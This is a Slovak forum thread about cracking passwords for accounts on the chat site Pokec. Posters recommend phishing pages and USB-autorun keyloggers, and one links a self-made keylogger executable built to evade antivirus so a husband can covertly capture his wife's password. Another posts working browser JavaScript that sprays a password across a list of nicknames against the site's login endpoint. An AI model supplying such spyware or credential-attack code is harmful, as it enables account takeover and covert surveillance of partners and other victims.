Password cracker na Pokec
-
Gepid
Medium Professional
- Kontaktovať používateľa:
Re: Password cracker na Pokec
Keď som mal ale 9 tak som häkoval kamarátov účty. A viem, že ma to po nejakých 5-10 zlých heslách proste stoplo. Zmeniť IP nepoholo. Dotyčný dostal ban na asi 15 minút. Určite by to išlo šikovne zneužiť
. Ale neviem, či to funguje ešte stále.
-
hojko
Site Admin
Gepid: Nebolo to tak v pripade hesiel na albumy, ze sa na 20min album blokol???
-
feromakovi
Expert
kedysi som tu aj mal ohľadne tohto tému. Robil som v delphi teda audiotrack spravil taký program že sa dalo cez to prihlásiť na kec cez wap. ja som to len prerobil aby tam tie hesla čítalo z texťáku. ale mne načítavalo celú stránku do vstavaného WebBrowsera tu som parsoval a zistil či sa prihlásilo alebo nie. no tým že čítalo celú stránku tak to bolo neskutočne pomalé hoci tá wap stránka zaberá asi 2 kB. tiež audio vtedy napísal že vhodnejšie riešenie by bolo cez synapse ale to som ešte nepoznal. a dalo by sa tam posielať len meno a heslo na ten wapový server metódou _get a potom získavať len hlavičku a z tej zistiť či prihlásenie prebehlo úspešne. ale na to už som bol lenivý. ale výsledok by bol nejaký program. ja som to rieššil tak že som našiel a zlepil na nete zopár kódov a mal som dosť dobrý keylogger ale funkčný len na xp, lebo vista a win7 už zachytili že niečo nieje v poriadku, použil ako autorun na USB a zistil som čo som chcel.. 
Taketo kraviny sa dobre davaju na skolske pocitace. Nechas to tam tyzden a za tyzden mas s keylogerov tolko hesiel ze az. Problem je ze asi ziadne nevyuzijes.
sak ti staci poslat nejakej osobe mail a tam dat odkaz cez html na pop-up okno, link nebude vidno lebo v popup oknach to tak byva napodobnis stranku kecu a ides
-
harrison314
Hardcore addict
neviem ci to pojde, Azet je proti Exploidom dost chraneny
a crackovat hesla tiez nieje njlepsi napad , vedu si zaznamy o kazdom neuspesnom prihlaseni, dokonca si ich moze pozriet aj uzivatel
a crackovat hesla tiez nieje njlepsi napad , vedu si zaznamy o kazdom neuspesnom prihlaseni, dokonca si ich moze pozriet aj uzivatel
-
audiotrack
VIP
popup okno ešte existuje? Ja že je to vec 90-tych rokov rovnako ako iframemienkofax napísal:sak ti staci poslat nejakej osobe mail a tam dat odkaz cez html na pop-up okno, link nebude vidno lebo v popup oknach to tak byva napodobnis stranku kecu a ides
Ten link kludne môze vidiet väcsina ludi ked uvidi pokec si ani nepozrie ci je skutocny a hned sa prihlasuju.mienkofax napísal:sak ti staci poslat nejakej osobe mail a tam dat odkaz cez html na pop-up okno, link nebude vidno lebo v popup oknach to tak byva napodobnis stranku kecu a ides
-
harrison314
Hardcore addict
Flexor napísal: Ten link kludne môze vidiet väcsina ludi ked uvidi pokec si ani nepozrie ci je skutocny a hned sa prihlasuju.
Ked pouzijes lightbox okoreneny AJAXOM , tak sa adresa nezmeni.
Druha vec je ,ako to chces dostat na mail.
chcem zistit ake heslo ma manzelka na pokec, je nato daky program?
Čítal si túto tému? Ak áno, určite si zistil, že ako amatér máš len malú šancu zistiť heslo. A nie, pogram na to sotva len tak nájdeš.
Ak je to manželka a prihlasuje sa na pokec z PC na ktorý máš prístup aj ty, použi nejaký keylogger a máš to vybavené
Ak je to manželka a prihlasuje sa na pokec z PC na ktorý máš prístup aj ty, použi nejaký keylogger a máš to vybavené
Ano, mam pristup k PC. Da sa konkretnejsie, aky program? Dik.
-
feromakovi
Expert
na toto som robil kedysi v delphi čo som spomínal vyššie...
stačí to len otvoriť a už je to... a nemal by to zachytiť ani antivírus...
všetky logy stlačené klávesy a stránky a všetko sa ukladá do c:/windows/ a tam je nejaký súbor txt nieč že UserControl a to si otvoríš v notepade a budeš to pekne vidieť..
nech poslúži
mne poslúžil...a spúšťa sa automaticky pri zapnutý pc... vlastne potom ako zistíš heslo tak mi len napíš a potom ti presne napíšem ako ho odsrániť lebo antivírus nejaký sa mi k tommu robiť už nechcelo 
stačí to len otvoriť a už je to... a nemal by to zachytiť ani antivírus...
Kód: Vybrať všetko
http://feromakovi.chytrak.cz/nieco.exenech poslúži
odkaz mi vypisuje:
ERROR application cannot strton this PC
Failed to setdata fer Win Control
ERROR application cannot strton this PC
Failed to setdata fer Win Control
Daj si do googlu keylogger download a nejaky si stiahni a otestuj. Potom ho iba vloz do PC a hotovo. Potom napis ako si dopadol (nie s programom ale s manzelokou
)
-
feromakovi
Expert
to je dobré ono to má vypisovať...to je len na oklamanie nepriateľa...a tak už to tam budeš mať...ak už žena bola odvtedy na keci tak máš tam zapísané jej heslo môžeš si ho pozrieť
ferimakovi odklikal som to a nic.
vcera som si stiahol All in one keylogger. vsetko v pohode sa ninstaloval, ikonu som mal na paneli uloh. a rano ikona tam uz nieje a programu sa neviem dostat lebo ho nikde neviem najst
//autoeditácia príspevku (16 Mar 2010, 17:01)
tak som to zistil, skoncilo to par fackami. prosim ta "Feromakovi" ako to odinstalujem?
vcera som si stiahol All in one keylogger. vsetko v pohode sa ninstaloval, ikonu som mal na paneli uloh. a rano ikona tam uz nieje a programu sa neviem dostat lebo ho nikde neviem najst
//autoeditácia príspevku (16 Mar 2010, 17:01)
tak som to zistil, skoncilo to par fackami. prosim ta "Feromakovi" ako to odinstalujem?
prosim ta, preco sa zakazdym pri spusteni pc pyta ci chcem program spustit, ved takto zena odklikne ze nie a je vymalovane... da sa tam zaskrtnut ze neziadat potvrdenie, ale aj tak to pri spusteni ziada. Inac aj to prihlasovacie meno a heslo sice dokazem vydedukovat z toho UpdateWin.txt, no nezobrazi ti konkretne heslo (mam na mysli velke pismena,cisla). Ale tak dik, este aby sa zena chytila...feromakovi napísal:na toto som robil kedysi v delphi čo som spomínal vyššie...
stačí to len otvoriť a už je to... a nemal by to zachytiť ani antivírus...všetky logy stlačené klávesy a stránky a všetko sa ukladá do c:/windows/ a tam je nejaký súbor txt nieč že UserControl a to si otvoríš v notepade a budeš to pekne vidieť..Kód: Vybrať všetko
http://feromakovi.chytrak.cz/nieco.exe
nech poslúžimne poslúžil...a spúšťa sa automaticky pri zapnutý pc... vlastne potom ako zistíš heslo tak mi len napíš a potom ti presne napíšem ako ho odsrániť lebo antivírus nejaký sa mi k tommu robiť už nechcelo
Ozaj, ako to potom odstranit z pc...
-
jorg22
Medium Professional
Kedze som sa nudil tak som spravil najjednoduchsi password cracker co ma napadol
. Odskusane len v prehliadaci Google Chrome.
Chodte na wap.pokec.sk.
Skopirujte toto vsetko do riadku URL:
vymazte hviezdicku pri javascript*: a stlacte enter a cakajte kym vam najde nejake heslo.
Skusa to jedno heslo na vsetky nicky. Ak chcete skusat vlastne nicky zmente riadok
A skusane heslo menite tu:
Chodte na wap.pokec.sk.
Skopirujte toto vsetko do riadku URL:
javascript*:
function tryMe(nick, pass)
{
url = 'http://prihlasenie.azet.sk/overenie';
xmlHttp = new XMLHttpRequest();
xmlHttp.open( "POST", url, false );
xmlHttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
try{
xmlHttp.send( 'form[username]='+ nick +'&form[password]='+ pass );
xmlHttp.responseText;}
catch(err){
alert('Nasiel nick:'+nick+' pass: '+pass);}
}
nicks = 'debil,lolo,test,imbos,kapor,tester,macher,sestricka,lamer,micka,cicka,sexica,blbecek,troll,fetak,heslo,slabeheslo,mongol,sumo,imbecil';
n = nicks.split(',');
for(var i in n)
tryMe(n, '1234567');
vymazte hviezdicku pri javascript*: a stlacte enter a cakajte kym vam najde nejake heslo.
Skusa to jedno heslo na vsetky nicky. Ak chcete skusat vlastne nicky zmente riadok
.nicks = 'vase,nicky,oddelene,ciarkou';
A skusane heslo menite tu:
tryMe(n, 'skusaneHeslo');
-
demeter1111
Novice
zdravim..da sa zistit heslo na pokec??? vdaka